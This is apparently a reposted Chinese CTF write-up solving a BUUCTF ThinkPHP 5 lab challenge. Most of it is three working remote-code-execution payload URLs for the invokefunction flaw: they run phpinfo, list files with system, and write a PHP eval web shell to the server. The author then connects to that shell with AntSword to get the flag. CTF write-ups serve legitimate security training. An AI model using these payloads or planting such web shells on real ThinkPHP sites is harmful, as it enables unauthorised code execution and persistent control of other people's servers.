本文共 665 字,大约阅读时间需要 2 分钟。
菜鸡懒得动手直接上buu一键搭建环境
http://node3.buuoj.cn:28078/
首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer
直接百度thinkPHP任意代码执行漏洞
poc:
http://node3.buuoj.cn:28078/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 #执行phpinfo函数,
http://node3.buuoj.cn:28078/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://node3.buuoj.cn:28078/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20eval($_POST[%27cmd%27]);%20?%3E%22%20%3E%20shell.php蚁剑连一下就进去啦! flag在phpinfo页面,搜索
flag
即可~ 转载地址:http://qapbi.baihongyu.com/